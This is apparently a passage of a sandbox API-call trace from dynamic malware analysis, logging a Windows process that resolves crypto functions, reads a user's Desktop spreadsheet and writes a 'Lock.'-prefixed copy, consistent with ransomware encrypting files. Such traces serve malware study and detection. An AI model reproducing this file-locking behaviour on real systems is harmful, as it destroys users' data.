Flags=0x0, Size=0xc) returned 0x34aa700 [0190.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0190.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa5f8 [0190.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa478 [0190.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0190.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa760 [0190.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa6b8 [0190.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0190.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0190.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0190.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0190.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0130 [0190.243] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0190.243] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0190.243] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0190.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa418 [0190.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0190.243] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0190.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0130 [0190.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0190.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0190.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0190.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0190.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0190.243] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0190.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00f0 [0190.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0190.243] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0190.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0190.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0190.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0190.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0190.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0190.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0190.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0190.244] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0190.244] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0190.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0190.244] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0190.244] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0130 [0190.244] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0190.244] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0190.244] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0190.244] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0190.244] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0190.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0190.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0190.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0190.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0190.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0190.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0190.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0190.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0190.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0190.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0190.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0190.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0190.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0190.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0190.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0190.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0190.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0190.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0190.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0190.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0190.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0190.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0190.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0190.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0190.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0190.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0190.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0190.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0190.246] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0190.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0130 [0190.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0120 [0190.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0190.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0190.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0190.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0190.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0190.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0190.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0120 [0190.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0190.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0130 [0190.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00f0 [0190.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0190.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0190.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0190.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0190.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0190.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0190.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00f0 [0190.247] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0190.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x11) returned 0x2466e10 [0190.247] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2466e10, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0190.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0190.247] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0190.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0190.247] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDestroyHash") returned 0x74d4df66 [0190.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0190.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0190.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0190.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00f0 [0190.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0190.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0190.248] CryptDestroyHash (hHash=0xaa5860) returned 1 [0190.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0190.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0190.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0130 [0190.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0190.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0190.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0190.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0080 [0190.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0190.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0190.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0190.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0190.248] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0190.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0190.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0080 [0190.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0190.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0190.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0190.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0190.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0190.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0190.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0190.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0190.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0190.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0190.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0190.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0190.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0190.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0190.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0190.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0190.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0190.250] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0130 [0190.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0190.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0190.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0190.250] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0190.250] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.250] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.250] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0190.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0190.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0190.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0190.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0190.250] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/YItI7wiYOV-Y.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\yiti7wiyov-y.xlsx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x268 [0190.251] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0190.251] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf2c8 | out: lpNewFilePointer=0x0) returned 1 [0190.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466d90 [0190.251] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0190.251] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.251] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0190.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0190.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0190.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0190.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0190.251] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/Lock.YItI7wiYOV-Y.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\lock.yiti7wiyov-y.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0190.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466df0 [0190.252] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0190.252] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.252] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0190.252] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0190.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0190.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0190.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0190.253] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf4ec | out: lpNewFilePointer=0x0) returned 1 [0190.253] ReadFile (in: hFile=0x268, lpBuffer=0x24b7a48, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x24b7a48*, lpNumberOfBytesRead=0x8bf500*=0x5d75, lpOverlapped=0x0) returned 1 [0190.254] ReadFile (in: hFile=0x268, lpBuffer=0x24b7a48, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x24b7a48*, lpNumberOfBytesRead=0x8bf500*=0x0, lpOverlapped=0x0) returned 1 [0190.254] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0190.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0190.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0190.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0190.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0190.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x5d75) returned 0x34a2048 [0190.255] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0190.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0190.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0190.255] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0190.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0190.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0190.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0190.255] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0190.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0190.255] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0190.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0190.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2ce8 [0190.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0190.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0190.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0190.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0190.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x5d75) returned 0x34a2048 [0190.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0190.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2dd8 [0190.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0190.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0190.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0190.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2058 [0190.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0190.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0190.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0190.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b16b8 [0190.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0190.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0190.256] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0190.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9af8 [0190.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0190.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0190.256] 